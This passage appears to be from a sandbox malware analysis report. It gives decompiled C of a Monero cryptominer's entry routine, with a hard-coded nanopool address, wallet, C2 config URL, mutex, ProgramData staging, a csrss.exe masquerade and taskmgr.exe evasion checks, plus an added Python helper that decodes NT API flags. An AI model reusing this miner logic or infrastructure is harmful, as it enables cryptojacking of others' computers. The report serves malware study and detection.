                                                                                                        				_v32 = 0x40;
                                                                                                        				_v28 = 0;
                                                                                                        				_v24 = 0;
                                                                                                        				_t20 = NtCreateFile(0x5d2df4, 0x120089,  &_v44,  &_v20,  &_v12, 0x80, 0, 1, 0x60, 0, 0); // same argument set as E004068E0 (FILE_GENERIC_READ, FILE_ATTRIBUTE_NORMAL, no sharing, FILE_OPEN, FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE); here ObjectName (_v36) points at _a4, i.e. the caller apparently passes the UNICODE_STRING by value on the stack
                                                                                                        				_t21 =  *0x5d2df4; // 0x320
                                                                                                        				// The decompiler dropped the condition of the two ternaries below. The only status produced in this function is the NTSTATUS in _t20,
                                                                                                        				// so the most plausible reading is: on a failing NtCreateFile the handle global is overwritten with INVALID_HANDLE_VALUE (0xffffffff), otherwise it keeps the returned handle.
                                                                                                        				_t22 =  !=  ? _t23 | 0xffffffff : _t21;
                                                                                                        				 *0x5d2df4 =  !=  ? _t23 | 0xffffffff : _t21;
                                                                                                        				return _t20;
                                                                                                        			}

                                                                                                        APIs
                                                                                                        • NtCreateFile.NTDLL(005D2DF4,00120089,?,00000000,?,00000080,00000000,00000001,00000060,00000000,00000000), ref: 004036FE
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateFile
                                                                                                        • String ID: @
                                                                                                        • API String ID: 823142352-2766056989
                                                                                                        • Opcode ID: 0251f1d50f9b636af99753684b82d5b31b70b56ad5df258657e6c05342283ce3
                                                                                                        • Instruction ID: 3021d29c1a01cdcb7ce1e86a2c6713ee4fd4a7efed1c7ac6ce7211f4987aa3f7
                                                                                                        • Opcode Fuzzy Hash: 0251f1d50f9b636af99753684b82d5b31b70b56ad5df258657e6c05342283ce3
                                                                                                        • Instruction Fuzzy Hash: B2015EB0D4130CABEB14DF90CD49BDEBBF9BF18304F10420AE505762C0D7B516488B98
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%
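The three native-API lines in the function listings above (NtOpenProcess, two NtCreateFile calls) give every argument as raw hex. The following Python is an editor's example added to this page; it is not part of the Joe Sandbox report or of the analysed sample. It parses lines in the report's own "Name.Module(arg,...), ref: addr" format and decodes the arguments that are fixed Windows constants (process and file access masks, FILE_ATTRIBUTE_*, FILE_SHARE_*, create disposition and FILE_* create options) into their SDK names, so that 0x120089 reads as FILE_GENERIC_READ and 0x60 as FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE. The input lines are copied from the APIs lists above; the flag tables are the constants from the Windows SDK and cover only the families these calls use, and the handling of "?" (an argument the sandbox could not resolve) is this example's own convention.

```python
import re
from typing import Dict, List, Optional

# Constructed input: the native-API lines from this report's "APIs" lists, in the
# report's own "Name.Module(arg,...), ref: addr" format ("?" = unresolved argument).
REPORT_LINES = [
    "NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00408AAF",
    "NtCreateFile.NTDLL(005D2DF8,00120089,00000018,00000000,00000000,00000080,"
    "00000000,00000001,00000060,00000000,00000000), ref: 0040697B",
    "NtCreateFile.NTDLL(005D2DF4,00120089,?,00000000,?,00000080,00000000,"
    "00000001,00000060,00000000,00000000), ref: 004036FE",
]

API_LINE = re.compile(r"^\W*(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)\s*$")

# Flag tables (values from the Windows SDK / ntifs.h); only the families these calls use.
FILE_ACCESS = {
    0x1: "FILE_READ_DATA", 0x2: "FILE_WRITE_DATA", 0x4: "FILE_APPEND_DATA",
    0x8: "FILE_READ_EA", 0x10: "FILE_WRITE_EA", 0x20: "FILE_EXECUTE",
    0x40: "FILE_DELETE_CHILD", 0x80: "FILE_READ_ATTRIBUTES", 0x100: "FILE_WRITE_ATTRIBUTES",
    0x10000: "DELETE", 0x20000: "READ_CONTROL", 0x40000: "WRITE_DAC",
    0x80000: "WRITE_OWNER", 0x100000: "SYNCHRONIZE", 0x1000000: "ACCESS_SYSTEM_SECURITY",
    0x10000000: "GENERIC_ALL", 0x20000000: "GENERIC_EXECUTE",
    0x40000000: "GENERIC_WRITE", 0x80000000: "GENERIC_READ",
}
# Composite rights: reported as one name when every bit of the composite is present.
FILE_GENERIC = {0x120089: "FILE_GENERIC_READ", 0x120116: "FILE_GENERIC_WRITE",
                0x1200A0: "FILE_GENERIC_EXECUTE"}
PROCESS_ACCESS = {
    0x1: "PROCESS_TERMINATE", 0x2: "PROCESS_CREATE_THREAD", 0x8: "PROCESS_VM_OPERATION",
    0x10: "PROCESS_VM_READ", 0x20: "PROCESS_VM_WRITE", 0x40: "PROCESS_DUP_HANDLE",
    0x80: "PROCESS_CREATE_PROCESS", 0x100: "PROCESS_SET_QUOTA", 0x200: "PROCESS_SET_INFORMATION",
    0x400: "PROCESS_QUERY_INFORMATION", 0x800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION", 0x100000: "SYNCHRONIZE",
}
FILE_ATTRIBUTES = {0x1: "FILE_ATTRIBUTE_READONLY", 0x2: "FILE_ATTRIBUTE_HIDDEN",
                   0x4: "FILE_ATTRIBUTE_SYSTEM", 0x10: "FILE_ATTRIBUTE_DIRECTORY",
                   0x20: "FILE_ATTRIBUTE_ARCHIVE", 0x80: "FILE_ATTRIBUTE_NORMAL",
                   0x100: "FILE_ATTRIBUTE_TEMPORARY"}
FILE_SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
CREATE_DISPOSITION = {0: "FILE_SUPERSEDE", 1: "FILE_OPEN", 2: "FILE_CREATE",
                      3: "FILE_OPEN_IF", 4: "FILE_OVERWRITE", 5: "FILE_OVERWRITE_IF"}
CREATE_OPTIONS = {
    0x1: "FILE_DIRECTORY_FILE", 0x2: "FILE_WRITE_THROUGH", 0x4: "FILE_SEQUENTIAL_ONLY",
    0x8: "FILE_NO_INTERMEDIATE_BUFFERING", 0x10: "FILE_SYNCHRONOUS_IO_ALERT",
    0x20: "FILE_SYNCHRONOUS_IO_NONALERT", 0x40: "FILE_NON_DIRECTORY_FILE",
    0x80: "FILE_CREATE_TREE_CONNECTION", 0x800: "FILE_RANDOM_ACCESS",
    0x1000: "FILE_DELETE_ON_CLOSE", 0x2000: "FILE_OPEN_BY_FILE_ID",
    0x4000: "FILE_OPEN_FOR_BACKUP_INTENT",
}


def decode_mask(value: int, table: Dict[int, str],
                composites: Optional[Dict[int, str]] = None) -> List[str]:
    """Split a bitmask into named flags, lowest bit first. Composites (e.g.
    FILE_GENERIC_READ) are matched against the full value, widest first, and
    their bits removed; any bit no table explains is kept as a hex remainder."""
    names: List[str] = []
    remaining = value
    for bits, name in sorted((composites or {}).items(),
                             key=lambda kv: -bin(kv[0]).count("1")):
        if value & bits == bits:
            names.append(name)
            remaining &= ~bits
    for bit, name in sorted(table.items()):
        if remaining & bit:
            names.append(name)
            remaining &= ~bit
    if remaining:
        names.append(f"0x{remaining:08X} (unknown)")
    return names


def decode_report_line(line: str) -> Dict[str, object]:
    """Parse one sandbox API line and decode the arguments whose meaning is a fixed constant."""
    m = API_LINE.match(line)
    if not m:
        raise ValueError(f"not an API line: {line!r}")
    api, module, raw_args, ref = m.groups()
    args = [None if a.strip() == "?" else int(a, 16) for a in raw_args.split(",")]
    out: Dict[str, object] = {"api": api, "module": module, "ref": int(ref, 16), "args": args}

    def dec(i: int, table: Dict[int, str], comps: Optional[Dict[int, str]] = None) -> List[str]:
        return ["? (unresolved)"] if args[i] is None else decode_mask(args[i], table, comps)

    if api == "NtOpenProcess":
        # NtOpenProcess(ProcessHandle, DesiredAccess, ObjectAttributes, ClientId)
        out["DesiredAccess"] = dec(1, PROCESS_ACCESS)
    elif api == "NtCreateFile":
        # NtCreateFile(FileHandle, DesiredAccess, ObjectAttributes, IoStatusBlock, AllocationSize,
        #              FileAttributes, ShareAccess, CreateDisposition, CreateOptions, EaBuffer, EaLength)
        out["DesiredAccess"] = dec(1, FILE_ACCESS, FILE_GENERIC)
        out["FileAttributes"] = dec(5, FILE_ATTRIBUTES)
        out["ShareAccess"] = dec(6, FILE_SHARE) or ["none (exclusive open)"]
        disp = args[7]
        out["CreateDisposition"] = ("? (unresolved)" if disp is None
                                    else CREATE_DISPOSITION.get(disp, f"0x{disp:X} (unknown)"))
        out["CreateOptions"] = dec(8, CREATE_OPTIONS)
    return out


if __name__ == "__main__":
    for line in REPORT_LINES:
        d = decode_report_line(line)
        print(f"{d['api']} @ {d['ref']:08X}:",
              {k: v for k, v in d.items() if k not in ("api", "module", "ref", "args")})
```

Run stand-alone it prints one decoded record per line; the useful reading for this sample is that both NtCreateFile calls open an existing file read-only, synchronously and without sharing, and that the NtOpenProcess handle only carries PROCESS_QUERY_INFORMATION, which is exactly what the GetExitCodeProcess liveness check in the first function needs and nothing more.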

                                                                                                        C-Code - Quality: 94%
                                                                                                        			_entry_() {
                                                                                                        				struct _SECURITY_ATTRIBUTES* _v8;
                                                                                                        				struct _SECURITY_ATTRIBUTES* _v12;
                                                                                                        				intOrPtr _v16;
                                                                                                        				char _v20;
                                                                                                        				int _v24;
                                                                                                        				struct _SECURITY_ATTRIBUTES* _v28;
                                                                                                        				long _v32;
                                                                                                        				long _v36;
                                                                                                        				char _v38;
                                                                                                        				short _v40;
                                                                                                        				char _v48;
                                                                                                        				char _v72;
                                                                                                        				char _v592;
                                                                                                        				char _v1112;
                                                                                                        				char _v2136;
                                                                                                        				char _v3160;
                                                                                                        				void _v7224;
                                                                                                        				long _t56;
                                                                                                        				signed int _t61;
                                                                                                        				void* _t65;
                                                                                                        				long _t66;
                                                                                                        				void* _t72;
                                                                                                        				void* _t74;
                                                                                                        				void* _t75;
                                                                                                        				void* _t76;
                                                                                                        				void* _t77;
                                                                                                        				int _t80;
                                                                                                        				void* _t82;
                                                                                                        				void* _t84;
                                                                                                        				void* _t89;
                                                                                                        				void* _t90;
                                                                                                        				void* _t91;
                                                                                                        				intOrPtr _t93;
                                                                                                        				void* _t94;
                                                                                                        				long _t96;
                                                                                                        				long _t99;
                                                                                                        				void* _t102;
                                                                                                        				char _t110;
                                                                                                        				char _t114;
                                                                                                        				char _t117;
                                                                                                        				char _t119;
                                                                                                        				short _t120;
                                                                                                        				void* _t125;
                                                                                                        				void* _t137;
                                                                                                        				void* _t139;
                                                                                                        				void* _t140;
                                                                                                        				void* _t145;
                                                                                                        				signed int _t148;
                                                                                                        				char _t150;
                                                                                                        				void* _t153;
                                                                                                        				void* _t158;
                                                                                                        				intOrPtr _t160;
                                                                                                        				struct _SECURITY_ATTRIBUTES* _t161;
                                                                                                        				void* _t166;
                                                                                                        				struct _SECURITY_ATTRIBUTES* _t168;
                                                                                                        				intOrPtr _t169;
                                                                                                        				void* _t171;
                                                                                                        				void* _t174;
                                                                                                        				void* _t175;
                                                                                                        				void* _t176;
                                                                                                        				void* _t177;
                                                                                                        				void* _t178;
                                                                                                        				void* _t179;
                                                                                                        				void* _t180;
                                                                                                        				void* _t181;
                                                                                                        				void* _t182;
                                                                                                        				void* _t183;
                                                                                                        				void* _t185;
                                                                                                        				void* _t186;
                                                                                                        				void* _t187;
                                                                                                        				void* _t188;
                                                                                                        				void* _t189;
                                                                                                        				void* _t196;
                                                                                                        				void* _t223;
                                                                                                        				void* _t224;
                                                                                                        				void* _t225;
                                                                                                        				void* _t226;
                                                                                                        				void* _t234;
                                                                                                        
                                                                                                        				_v8 = 0;
                                                                                                        				_v12 = 0;
                                                                                                        				_v28 = 0;
                                                                                                        				_t56 = GetTickCount();
                                                                                                        				_t150 = 0;
                                                                                                        				_v32 = _t56;
                                                                                                        				_v36 = _t56;
                                                                                                        				_v24 = 0;
                                                                                                        				 *0x5d2df4 = 0;
                                                                                                        				E00401670("xmr-us-east1.nanopool.org:14444", 0, 0xcc8);
                                                                                                        				asm("xorps xmm0, xmm0");
                                                                                                        				asm("movq [ebp-0x10], xmm0");
                                                                                                        				E00401BB0( &_v7224, 0, 0xfe0);
                                                                                                        				memcpy("48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos",  &_v7224, 0x3f8 << 2);
                                                                                                        				_t152 = 0;
                                                                                                        				_t61 = SetErrorMode(2); // executed
                                                                                                        				SetErrorMode(_t61 | 0x00000002); // executed
                                                                                                        				E004017E0("e9c1286a28d82a2d0ee6", "e9c1286a28d82a2d0ee6");
                                                                                                        				_t174 = _t171 + 0x2c;
                                                                                                        				_t65 = CreateMutexA(0, 0, "e9c1286a28d82a2d0ee6"); // executed
                                                                                                        				if(_t65 == 0) {
                                                                                                        					ExitProcess(0x1e);
                                                                                                        				}
                                                                                                        				_t158 = GetLastError;
                                                                                                        				_t66 = GetLastError();
                                                                                                        				_t191 = _t66 - 0xb7;
                                                                                                        				if(_t66 == 0xb7) {
                                                                                                        					ExitProcess(0x1f);
                                                                                                        				}
                                                                                                        				E00403220(0, SetErrorMode, _t191);
                                                                                                        				_t166 = CommandLineToArgvW(GetCommandLineW(),  &_v24);
                                                                                                        				if(_t166 != 0 && _v24 > 1) {
                                                                                                        					_t148 = E004019C0( *((intOrPtr*)(_t166 + 4)), L"--show-window");
                                                                                                        					_t174 = _t174 + 8;
                                                                                                        					asm("sbb eax, eax");
                                                                                                        					 *0x5d1bb8 =  *0x5d1bb8 &  ~_t148;
                                                                                                        				}
                                                                                                        				LocalFree(_t166);
                                                                                                        				_t72 = E00401000(_t152, _t158, _t166,  *0x5d1314); // executed
                                                                                                        				_t175 = _t174 + 4;
                                                                                                        				_t195 = _t72;
                                                                                                        				if(_t72 != 0) {
                                                                                                        					E00408070(_t152, _t195, "d06ed635-68f6-4e9a-955c-4899f5f57b9a"); // executed
                                                                                                        					_t176 = _t175 + 4;
                                                                                                        					_t196 =  *0x5d1bc0 - _t150; // 0x0
                                                                                                        					if(_t196 != 0) {
                                                                                                        						E004017E0("48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos", "d06ed635-68f6-4e9a-955c-4899f5f57b9a");
                                                                                                        						_t176 = _t176 + 8;
                                                                                                        					}
                                                                                                        					_t74 = E00401600("LKBNMTFJgl", "LKBNMTFJgl");
                                                                                                        					_t177 = _t176 + 8;
                                                                                                        					if(_t74 != 0) {
                                                                                                        						_t75 = E00401600("csrss.exe", "csrss.exe");
                                                                                                        						_t178 = _t177 + 8;
                                                                                                        						if(_t75 != 0) {
                                                                                                        							_t76 = E00401600("viTRMUuKeV", "viTRMUuKeV");
                                                                                                        							_t179 = _t178 + 8;
                                                                                                        							if(_t76 != 0) {
                                                                                                        								_t77 = E00407FA0(_t152, "C:\ProgramData\LKBNMTFJgl", 0x40aae0, 0x23); // executed
                                                                                                        								_t180 = _t179 + 0xc;
                                                                                                        								if(_t77 != 0) {
                                                                                                        									E00401970("C:\ProgramData\LKBNMTFJgl", "\\");
                                                                                                        									E00401970("C:\ProgramData\LKBNMTFJgl", "LKBNMTFJgl");
                                                                                                        									_t181 = _t180 + 0x10;
                                                                                                        									_t80 = CreateDirectoryW("C:\ProgramData\LKBNMTFJgl", 0); // executed
                                                                                                        									if(_t80 != 0 || GetLastError() == 0xb7) {
                                                                                                        										if(E00408DD0() != 0 &&  *0x5d210c == 1) {
                                                                                                        											_t145 = CreateThread(0, 0, E00408450, 0, 0, 0); // executed
                                                                                                        											 *0x5d211c = _t145;
                                                                                                        										}
                                                                                                        										_t82 = E004017B0("FALSE", "http://45.144.225.135/config.txt");
                                                                                                        										_t182 = _t181 + 8;
                                                                                                        										if(_t82 == 0) {
                                                                                                        											L33:
                                                                                                        											_t84 = E00403150( &_v1112); // executed
                                                                                                        											_t183 = _t182 + 4;
                                                                                                        											if(_t84 != 0) {
                                                                                                        												E004030B0( &_v1112,  &_v2136,  &_v3160);
                                                                                                        												__imp__SetThreadExecutionState(0x80000041, 0);
                                                                                                        												_t89 = E00403CA0(_t152, _t153, 1, "xmr-us-east1.nanopool.org:14444", "48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos", 0x5d12c0,  *0x5d131c); // executed
                                                                                                        												_t185 = _t183 + 0x24;
                                                                                                        												if(_t89 == 0) {
                                                                                                        													L91:
                                                                                                        													ExitProcess(0x3d);
                                                                                                        												}
                                                                                                        												_t90 = E00403CA0(_t152, _t153, 0, "xmr-us-east1.nanopool.org:14444", "48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos", 0x5d12c0,  *0x5d131c); // executed
                                                                                                        												_t186 = _t185 + 0x14;
                                                                                                        												if(_t90 == 0) {
                                                                                                        													goto L91;
                                                                                                        												}
                                                                                                        												L38:
                                                                                                        												while(1) {
                                                                                                        													if( *0x5d1300 != 0) {
                                                                                                        														_t169 = _v28;
                                                                                                        														if(_t169 == 0) {
                                                                                                        															_t96 = GetTickCount();
                                                                                                        															_t215 = _t96 - _v36 - 0x4e20;
                                                                                                        															if(_t96 - _v36 > 0x4e20) {
                                                                                                        																E004065D0(_t215); // executed
                                                                                                        																_t170 =  !=  ? 1 : _t169;
                                                                                                        																_v28 =  !=  ? 1 : _t169;
                                                                                                        															}
                                                                                                        														}
                                                                                                        													}
                                                                                                        													if( *0x5d1308 == 3) {
                                                                                                        														_t160 =  *0x5d1310; // 0x7530
                                                                                                        														_t161 = _t160 + 1;
                                                                                                        														__eflags = _t161;
                                                                                                        													} else {
                                                                                                        														_t161 = E00408040();
                                                                                                        													}
                                                                                                        													_t91 = E00408A50(_t150); // executed
                                                                                                        													_t187 = _t186 + 4;
                                                                                                        													_t168 =  ==  ? 1 : _t91;
                                                                                                        													if( *0x5d1304 == 0) {
                                                                                                        														_t93 = _v12;
                                                                                                        													} else {
                                                                                                        														_t93 = E00407EF0("taskmgr.exe"); // executed
                                                                                                        														_t187 = _t187 + 4;
                                                                                                        														_v12 = _t93;
                                                                                                        													}
                                                                                                        													if(_t150 == 0 || _t168 == 0) {
                                                                                                        														if(_t93 != 0) {
                                                                                                        															goto L58;
                                                                                                        														}
                                                                                                        														_t223 =  *0x5d1320 - _t93; // 0x0
                                                                                                        														if(_t223 != 0) {
                                                                                                        															goto L58;
                                                                                                        														}
                                                                                                        														_t224 =  *0x5d2110 - _t93; // 0x0
                                                                                                        														if(_t224 != 0) {
                                                                                                        															goto L58;
                                                                                                        														}
                                                                                                        														_t225 = _t161 -  *0x5d1310; // 0x7530
                                                                                                        														if(_t225 <= 0) {
                                                                                                        															__eflags =  *0x5d1308;
                                                                                                        															if( *0x5d1308 != 0) {
                                                                                                        																_t117 = E00403050(_t150, _t152,  &_v2136, 0); // executed
                                                                                                        																_t187 = _t187 + 8;
                                                                                                        																_t150 = _t117;
                                                                                                        																_t168 = 1;
                                                                                                        															}
                                                                                                        															_v8 = 0;
                                                                                                        															goto L68;
                                                                                                        														}
                                                                                                        														_t119 = E00403050(_t150, _t152,  &_v3160, _t93);
                                                                                                        														_t187 = _t187 + 8;
                                                                                                        														_v8 = 1;
                                                                                                        														_t150 = _t119;
                                                                                                        														_t168 = 1;
                                                                                                        														goto L59;
                                                                                                        													} else {
                                                                                                        														L58:
                                                                                                        														__eflags = _v8;
                                                                                                        														if(_v8 == 0) {
                                                                                                        															L68:
                                                                                                        															_t234 = _t161 -  *0x5d1310; // 0x7530
                                                                                                        															if(_t234 <= 0) {
                                                                                                        																L75:
                                                                                                        																__eflags = _v12;
                                                                                                        																if(_v12 == 0) {
                                                                                                        																	L77:
                                                                                                        																	if( *0x5d1320 == 0) {
                                                                                                        																		L79:
                                                                                                        																		if( *0x5d2110 == 0) {
                                                                                                        																			L82:
                                                                                                        																			_t94 = E004017B0("FALSE", "http://45.144.225.135/config.txt");
                                                                                                        																			_t186 = _t187 + 8;
                                                                                                        																			if(_t94 != 0) {
                                                                                                        																				_t99 = GetTickCount();
                                                                                                        																				_t152 =  *0x5d1bb4 * 0xea60;
                                                                                                        																				_t245 = _t99 - _v32 -  *0x5d1bb4 * 0xea60;
                                                                                                        																				if(_t99 - _v32 >  *0x5d1bb4 * 0xea60) {
                                                                                                        																					_v32 = GetTickCount();
                                                                                                        																					_t102 = E00404DE0(_t152, _t153, _t245, "http://45.144.225.135/config.txt", "FALSE", "xmr-us-east1.nanopool.org:14444", _t150, _t168);
                                                                                                        																					_t186 = _t186 + 0x14;
                                                                                                        																					if(_t102 != 0) {
                                                                                                        																						if(E004039B0(_t153) != 0) {
                                                                                                        																							if(_t168 != 0) {
                                                                                                        																								E00408730(_t150);
                                                                                                        																								_t186 = _t186 + 4;
                                                                                                        																							}
                                                                                                        																							E00403CA0(_t152, _t153, 1, "xmr-us-east1.nanopool.org:14444", "48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos", 0x5d12c0,  *0x5d131c);
                                                                                                        																							E00403CA0(_t152, _t153, 0, "xmr-us-east1.nanopool.org:14444", "48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos", 0x5d12c0,  *0x5d131c);
                                                                                                        																							_t186 = _t186 + 0x28;
                                                                                                        																						}
                                                                                                        																						E00403B50(_t153, _v20, _v16);
                                                                                                        																						_t186 = _t186 + 8;
                                                                                                        																					}
                                                                                                        																				}
                                                                                                        																			}
                                                                                                        																			Sleep(0xfa0); // executed
                                                                                                        																			continue;
                                                                                                        																		}
                                                                                                        																		L80:
                                                                                                        																		if(_t168 == 0) {
                                                                                                        																			goto L82;
                                                                                                        																		}
                                                                                                        																		L81:
                                                                                                        																		E00408730(_t150);
                                                                                                        																		_t187 = _t187 + 4;
                                                                                                        																		_t168 = 0;
                                                                                                        																		goto L82;
                                                                                                        																	}
                                                                                                        																	L78:
                                                                                                        																	if(_t168 != 0) {
                                                                                                        																		goto L81;
                                                                                                        																	}
                                                                                                        																	goto L79;
                                                                                                        																}
                                                                                                        																L76:
                                                                                                        																__eflags = _t168;
                                                                                                        																if(_t168 != 0) {
                                                                                                        																	goto L81;
                                                                                                        																}
                                                                                                        																goto L77;
                                                                                                        															}
                                                                                                        															if(_v12 != 0) {
                                                                                                        																goto L76;
                                                                                                        															}
                                                                                                        															if( *0x5d1320 != 0) {
                                                                                                        																goto L78;
                                                                                                        															}
                                                                                                        															if( *0x5d2110 != 0) {
                                                                                                        																goto L80;
                                                                                                        															}
                                                                                                        															if(_t168 != 0) {
                                                                                                        																E00408730(_t150);
                                                                                                        																_t187 = _t187 + 4;
                                                                                                        															}
                                                                                                        															_t110 = E00403050(_t150, _t152,  &_v3160, 0);
                                                                                                        															_t187 = _t187 + 8;
                                                                                                        															_v8 = 1;
                                                                                                        															_t150 = _t110;
                                                                                                        															_t168 = 1;
                                                                                                        															goto L77;
                                                                                                        														}
                                                                                                        														L59:
                                                                                                        														_t226 = _t161 -  *0x5d1310; // 0x7530
                                                                                                        														if(_t226 > 0) {
                                                                                                        															goto L75;
                                                                                                        														}
                                                                                                        														if(_v12 != 0) {
                                                                                                        															goto L76;
                                                                                                        														}
                                                                                                        														if( *0x5d1320 != 0) {
                                                                                                        															goto L78;
                                                                                                        														}
                                                                                                        														if( *0x5d2110 != 0) {
                                                                                                        															goto L80;
                                                                                                        														}
                                                                                                        														if(_t168 != 0) {
                                                                                                        															E00408730(_t150);
                                                                                                        															_t187 = _t187 + 4;
                                                                                                        															_t168 = 0;
                                                                                                        														}
                                                                                                        														if( *0x5d1308 != 0) {
                                                                                                        															_t114 = E00403050(_t150, _t152,  &_v2136, 0);
                                                                                                        															_t187 = _t187 + 8;
                                                                                                        															_t150 = _t114;
                                                                                                        															_t168 = 1;
                                                                                                        														}
                                                                                                        														_v8 = 0;
                                                                                                        														goto L68;
                                                                                                        													}
                                                                                                        												}
                                                                                                        											}
                                                                                                        											ExitProcess(0x1c);
                                                                                                        										} else {
                                                                                                        											_t120 =  *0x5d2074; // 0x3832
                                                                                                        											asm("movq xmm0, [0x5d206c]");
                                                                                                        											_v40 = _t120;
                                                                                                        											asm("movq [ebp-0x2c], xmm0");
                                                                                                        											_v38 = _t150;
                                                                                                        											E00401A00( &_v592, "C:\ProgramData\LKBNMTFJgl");
                                                                                                        											_t125 = E00401600( &_v72,  &_v48);
                                                                                                        											_t183 = _t182 + 0x10;
                                                                                                        											if(_t125 == 0) {
                                                                                                        												ExitProcess(0x2f);
                                                                                                        											}
                                                                                                        											E00401970( &_v592, "\\");
                                                                                                        											E00401970( &_v592,  &_v72);
                                                                                                        											E00401970( &_v592, "_");
                                                                                                        											E00401970( &_v592, L"3.1.0");
                                                                                                        											_t188 = _t183 + 0x20;
                                                                                                        											_t137 =  *0x5d10b8( &_v592,  &_v20, 0, 0);
                                                                                                        											_t207 = _t137 - 1;
                                                                                                        											if(_t137 == 1) {
                                                                                                        												_t139 = E004037E0(_t207,  &_v592); // executed
                                                                                                        												_t189 = _t188 + 4;
                                                                                                        												_t208 = _t139;
                                                                                                        												if(_t139 != 0) {
                                                                                                        													E004039B0(_t153);
                                                                                                        													_push(_v16);
                                                                                                        													E00403680(_t153, _v20);
                                                                                                        													_t189 = _t189 + 8;
                                                                                                        												}
                                                                                                        												_t140 = E00404DE0(_t152, _t153, _t208, "http://45.144.225.135/config.txt", "FALSE", "xmr-us-east1.nanopool.org:14444", 0, 0); // executed
                                                                                                        												_t182 = _t189 + 0x14;
                                                                                                        												if(_t140 != 0) {
                                                                                                        													E004039B0(_t153);
                                                                                                        													E00403B50(_t153, _v20, _v16); // executed
                                                                                                        													_t182 = _t182 + 8;
                                                                                                        												}
                                                                                                        												goto L33;
                                                                                                        											}
                                                                                                        											ExitProcess(0x3c);
                                                                                                        										}
                                                                                                        									} else {
                                                                                                        										ExitProcess(0x32);
                                                                                                        									}
                                                                                                        								}
                                                                                                        								ExitProcess(0x31);
                                                                                                        							}
                                                                                                        							ExitProcess(0x30);
                                                                                                        						}
                                                                                                        						ExitProcess(0x30);
                                                                                                        					} else {
                                                                                                        						ExitProcess(0x30);
                                                                                                        					}
                                                                                                        				}
                                                                                                        				ExitProcess(0x3b);
                                                                                                        			}
                                                                                                        [Instruction address column for the decompiled function above (0x0040447e to 0x004049b1); its per-line alignment with the C listing was lost in extraction.]
                                                                                                        0x004049f9
                                                                                                        0x004049f9
                                                                                                        0x004049fd
                                                                                                        0x00404a03
                                                                                                        0x00404a0a
                                                                                                        0x00404a10
                                                                                                        0x00404a17
                                                                                                        0x00404a28
                                                                                                        0x00404a32
                                                                                                        0x00404a37
                                                                                                        0x00404a3c
                                                                                                        0x00404a48
                                                                                                        0x00404a4a
                                                                                                        0x00404a57
                                                                                                        0x00404a59
                                                                                                        0x00404a72
                                                                                                        0x00404a75
                                                                                                        0x00404a7a
                                                                                                        0x00404a7f
                                                                                                        0x00404a88
                                                                                                        0x00404a8c
                                                                                                        0x00404a8f
                                                                                                        0x00404a94
                                                                                                        0x00404a94
                                                                                                        0x00404aae
                                                                                                        0x00404aca
                                                                                                        0x00404acf
                                                                                                        0x00404acf
                                                                                                        0x00404ad8
                                                                                                        0x00404add
                                                                                                        0x00404add
                                                                                                        0x00404a7f
                                                                                                        0x00404a59
                                                                                                        0x00404ae5
                                                                                                        0x00000000
                                                                                                        0x00404ae5
                                                                                                        0x00404a19
                                                                                                        0x00404a1b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00404a1d
                                                                                                        0x00404a1e
                                                                                                        0x00404a23
                                                                                                        0x00404a26
                                                                                                        0x00000000
                                                                                                        0x00404a26
                                                                                                        0x00404a0c
                                                                                                        0x00404a0e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00404a0e
                                                                                                        0x004049ff
                                                                                                        0x004049ff
                                                                                                        0x00404a01
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00404a01
                                                                                                        0x004049b7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004049c0
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004049c9
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004049cd
                                                                                                        0x004049d0
                                                                                                        0x004049d5
                                                                                                        0x004049d5
                                                                                                        0x004049e1
                                                                                                        0x004049e6
                                                                                                        0x004049e9
                                                                                                        0x004049f0
                                                                                                        0x004049f2
                                                                                                        0x00000000
                                                                                                        0x004049f2
                                                                                                        0x00404946
                                                                                                        0x00404946
                                                                                                        0x0040494c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00404956
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00404963
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00404970
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00404978
                                                                                                        0x0040497b
                                                                                                        0x00404980
                                                                                                        0x00404983
                                                                                                        0x00404983
                                                                                                        0x0040498c
                                                                                                        0x00404997
                                                                                                        0x0040499c
